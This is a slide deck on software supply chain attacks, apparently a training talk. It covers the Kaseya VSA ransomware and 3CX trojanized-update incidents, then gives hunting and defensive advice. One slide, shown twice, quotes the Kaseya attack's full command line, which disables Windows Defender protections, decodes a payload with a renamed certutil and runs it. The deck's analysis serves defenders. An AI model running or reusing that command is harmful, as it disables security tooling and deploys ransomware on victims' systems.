SlideShare a Scribd company logo

Supply Chain Attacks

L
Lionel Faleiro

This document discusses supply chain attacks and provides examples of recent attacks. It defines supply chain attacks as compromising enterprise networks via third party applications or entities. The document then summarizes the anatomy and timeline of the Kaseya and 3CX ransomware attacks. In the Kaseya attack, a malicious task was deployed to VSA servers which then pushed ransomware downstream. The 3CX attack involved a trojanized software update that bundled a malicious DLL leading to data theft. Finally, the document outlines defenses such as software inventory, access controls, and secure development practices to help prevent supply chain attacks.

1 of 16
Download to read offline
Supply Chain Attacks
#WHOAMI • Lionel Faleiro • Key Domains – Malware Analysis, Log Analysis, IR and Security Analytics, Training, Threat Intelligence • Gamer, Photographer • @sandmaxprime 2
Agenda 3 What are Supply Chain Attacks Attack Vectors In The News Anatomy of an Attack Defending against SCA
What are Supply Chain Attack 4 • Value chain attack / 3rd party attack • Compromise of enterprise networks -> via applications, 3rd part entities • Executed by APT groups • Who is the target?
Attack vectors 5 • Third party software providers • Data storage solutions • Development or testing platforms • Website services • Repositories
In the News 6
Anatomy of an Attack – Kaseya Ransomware 7 • Happened on July 2 2021 • Kaseya VSA servers were exploited to deploy ransomware downstream to users • Kaseya VSA Agent Hot-Fix <- Malicious task • Ransomware encryptor pushed agent.crt → agent.exe • Used DLL sideloading against Windows Defender -> Revil -> Registry Key • Were timed to encrypt at 1630 UTC • Around 60 customers and 1500+ businesses
Anatomy of an Attack – Kaseya Ransomware 8 "C:WINDOWSsystem32cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference - DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true - DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled - SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% > > C:Windowscert.exe & C:Windowscert.exe - decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe
Anatomy of an Attack – 3CX 9 • 3CX Desktop App • Software was compromised with Trojanized versions • Bundled malicious DLL -> ffmpeg.dll • EDR Alerts - March 29th • Content • Suddenicon -> downloaded encrypted icon files - https://github[.]com/IconStorages/images • Icon files had C2 -> Iconicstealer • Mandiant -> UNC4736 • Double supply chain attack => X_Trader -> VeiledSignal
Anatomy of an Attack – 3CX 10
Anatomy of an Attack – 3CX 11 • 3CX systems were infected with TaxHaul malware on Windows and SimpleSea on MacOS • Used Fast Reverse Proxy to move laterally
Anatomy of an Attack – 3CX 12
Anatomy of an Attack – 3CX 13 • Initial Response • Determine scope of exploited installs • Hunt for the IOCs – Connections to the domains and Hashes • Hunt for child processes of the Desktop App • Hunt for suspicious loading of the DLL files
Anatomy of an Attack – 3CX 14
Defending Against SCA 15 • Have security guidelines for suppliers • Vulnerability management system • Good software inventory • Enforce change control • Restricted access rights / controls • Identify alternatives / failover processes • Well defined SDLC and secure coding practices • Protect code and repositories
References 16 • https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks • https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_prog ress/ • https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise • https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to- iconic-incident/ • https://twitter.com/fr0gger_ • https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/ • https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/

More Related Content

Supply Chain Attacks

  • 2. #WHOAMI • Lionel Faleiro • Key Domains – Malware Analysis, Log Analysis, IR and Security Analytics, Training, Threat Intelligence • Gamer, Photographer • @sandmaxprime 2
  • 3. Agenda 3 What are Supply Chain Attacks Attack Vectors In The News Anatomy of an Attack Defending against SCA
  • 4. What are Supply Chain Attack 4 • Value chain attack / 3rd party attack • Compromise of enterprise networks -> via applications, 3rd part entities • Executed by APT groups • Who is the target?
  • 5. Attack vectors 5 • Third party software providers • Data storage solutions • Development or testing platforms • Website services • Repositories
  • 7. Anatomy of an Attack – Kaseya Ransomware 7 • Happened on July 2 2021 • Kaseya VSA servers were exploited to deploy ransomware downstream to users • Kaseya VSA Agent Hot-Fix <- Malicious task • Ransomware encryptor pushed agent.crt → agent.exe • Used DLL sideloading against Windows Defender -> Revil -> Registry Key • Were timed to encrypt at 1630 UTC • Around 60 customers and 1500+ businesses
  • 8. Anatomy of an Attack – Kaseya Ransomware 8 "C:WINDOWSsystem32cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:WindowsSystem32WindowsPowerShellv1.0powershell.exe Set-MpPreference - DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true - DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled - SubmitSamplesConsent NeverSend & copy /Y C:WindowsSystem32certutil.exe C:Windowscert.exe & echo %RANDOM% > > C:Windowscert.exe & C:Windowscert.exe - decode c:kworkingagent.crt c:kworkingagent.exe & del /q /f c:kworkingagent.crt C:Windowscert.exe & c:kworkingagent.exe
  • 9. Anatomy of an Attack – 3CX 9 • 3CX Desktop App • Software was compromised with Trojanized versions • Bundled malicious DLL -> ffmpeg.dll • EDR Alerts - March 29th • Content • Suddenicon -> downloaded encrypted icon files - https://github[.]com/IconStorages/images • Icon files had C2 -> Iconicstealer • Mandiant -> UNC4736 • Double supply chain attack => X_Trader -> VeiledSignal
  • 10. Anatomy of an Attack – 3CX 10
  • 11. Anatomy of an Attack – 3CX 11 • 3CX systems were infected with TaxHaul malware on Windows and SimpleSea on MacOS • Used Fast Reverse Proxy to move laterally
  • 12. Anatomy of an Attack – 3CX 12
  • 13. Anatomy of an Attack – 3CX 13 • Initial Response • Determine scope of exploited installs • Hunt for the IOCs – Connections to the domains and Hashes • Hunt for child processes of the Desktop App • Hunt for suspicious loading of the DLL files
  • 14. Anatomy of an Attack – 3CX 14
  • 15. Defending Against SCA 15 • Have security guidelines for suppliers • Vulnerability management system • Good software inventory • Enforce change control • Restricted access rights / controls • Identify alternatives / failover processes • Well defined SDLC and secure coding practices • Protect code and repositories
  • 16. References 16 • https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks • https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_prog ress/ • https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise • https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to- iconic-incident/ • https://twitter.com/fr0gger_ • https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/ • https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/